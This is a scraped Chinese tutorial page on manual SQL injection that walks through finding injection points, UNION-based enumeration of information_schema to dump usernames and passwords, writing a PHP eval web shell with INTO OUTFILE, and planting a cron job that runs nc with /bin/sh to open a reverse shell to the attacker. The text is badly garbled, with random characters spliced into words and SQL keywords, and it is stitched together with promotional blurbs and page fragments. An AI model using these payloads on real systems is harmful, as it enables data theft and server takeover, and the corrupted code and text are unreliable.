查询所有数据库名称 show databas； 选中某个数据库 use 数据名字 查询数据库中所有的表 show tables； 查询表中所有数据 *代表所有 select * f轮省乙rom 表名 条件查询表中数据 where条件成立才会执行 i证香凯久病文员知f select 字名 from表名 where xx = xx； 合并双装技践沿推/联合查询字段数量要相同 select 字段名 from表名 union select字段名 from表名 1.判断注入点 And 1 = 1 And 1 =2 乱输入测场吸庆提试是否有注入点 2.猜解列名数量（字段数） order by x错不亲美婷黄假误与正常 3.报错猜解 Id= -1 unio select 1，2，3，4 4.判断回显点 5.信息收集 数据库欢律旧县议行语队争游版本 version() 数据库名 database() 数据库用户 user() 操作系统 @@version_compile_os 1.在mysql5.0版本以上，mysql自带一个数据库informati背on_schema 2.数据库中符号”.”代表下一级 user.name Information_schema.tables 记录所有表名信息的表 In坏析职那弦引formation_schema.columns 记录所有列名信息的表 Table_name :表名 Column_na 列名 Table_schema:数据库名 查询指定A数据库名下的表名信息：p union select 1,group_concat(table_name),3 f线介乱程溶rom information_schema.tables where table_schema = database()--+ union select 1,group_concat(t聚富药卷当担垂手态able_name),3,4 送果周她展命武斯石将from infor节陆绍mation_schema.tables 防根列吸where tabl_schema=database() 查询指定口分跳见尽谓双基学压表名表下列的信息 union select 1,group_concat(columname),3 from information_schema.columns where table_name = 'users'--+ union se害单者定短酒乐视lect 1,group_cncat(column_name),3,4 from iormation_schema.colu使先威父五阶mns where table_name = 'StormGp_member' 查询指定数据 name password unin select 1,username,pas断甚sword from user limit 1,1--+ union SELECT 1,2,(select g秋快抓跟器细或势族真治roup_concat(name,password) from users),4 SQL手工注入大全：包含各种类型的SQL注入，实现手工注入的乐趣，此资源你言汉念龙古稳断刻仅袁成值得拥有。此资源包含：宽字节注入、SQL手工注入漏洞测试(Oracle数据库SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入松据她容才元越远副危板漏洞测试(PostgreSQL数据库)、SQL手工注入无打改新兵出政风密漏洞测试(MongoDB数据库)、SQL手工注入漏洞测试(Sybase数据库)、SQL手工注入漏洞测路试(SQLite数据库)、SQL手工注入漏洞测试(Db2数据库)谈于角妈水族、SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测延时注入（时间注入）等。 sqlmap等sq工具不能利用的SQL注入点，可尝试手工注入，或许有意外的惊喜，满足你ql注入欲望。来吧，小伙伴，尽情的下载、限怕草歌然后肆无忌惮的尝试手工注吧。来吧，小伙伴，尽情的下载、然后肆无忌惮的尝试手工注入吧。 SQL手工注入大全各种类型的SQL注入，实现手工注入的乐趣，此资源你值得拥有。 这期学是给小白学习的，大佬看看就好。我们范陈价好父移事期粉先打开靶场：【靶场】我们先进去发现是一个很简单的页端。我们先判断是否有注入。 我们先在链接后面添加: and 1=1来判断是鸡广坐效冲病光移否有注入。 发现返回正常。我们再在链接末尾输入:an =2这里我们发现与之前and 1=1时的按集谈父草张杆组坐封林界面不一样了这就注入。 （这里解释一下and 1=1是什么意思殖沙当念毫云些温其实很简单就是你问一个服务器1是不是=1所以我们and 1=1返回正常 and1=2就是问1与科米是不是=2所以我们报错了）

当我们找到注入点 可以进行字符串猜解长度可以理解为是按照一列一列的查看密码的长度。 ‘order by 4氢父如来还# 报错 ‘order by 3#页面正常 有3个字段 ‘union select “”,””,”?php eval($_GET[cmd]);?” into outfile “/var/www/888.php”# 将php代码写入/var/www/htl下的888。php union一个操作符，必见五注权找住连叫须SELECT语句组成。 /var/www/html网页文件的路径 into outfile导出多行数据，文件名必须全路径（绝对路径） dumpfile功能一样但是只能导出一行数据 写一句话木马（基本操作） 得到webshell whereis 查看命令的路径 查看nc命令的绝对路径 注当前此linux版本存在nc漏洞，可根据版本更改 返回/usr/bin/nc.traditional 设定定时任务反弹shell ‘union select “”,””,”* * * root /usr/bin/nc.traditional kail的IP监听端口 –c /bin/sh ” into outfile “/etc/cron.d/666”# 解析* * *分别对应分时日月周这里利用的linux的系统定时任务 参与评论 您还未登录，请先 登录 后发表或查看评论 往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结，不会有详细的知识解读，类似于查询手册的形式，便于以后的复习与查阅，文中内容可能会存在错误，望师傅们斧正！0x01 01-02 498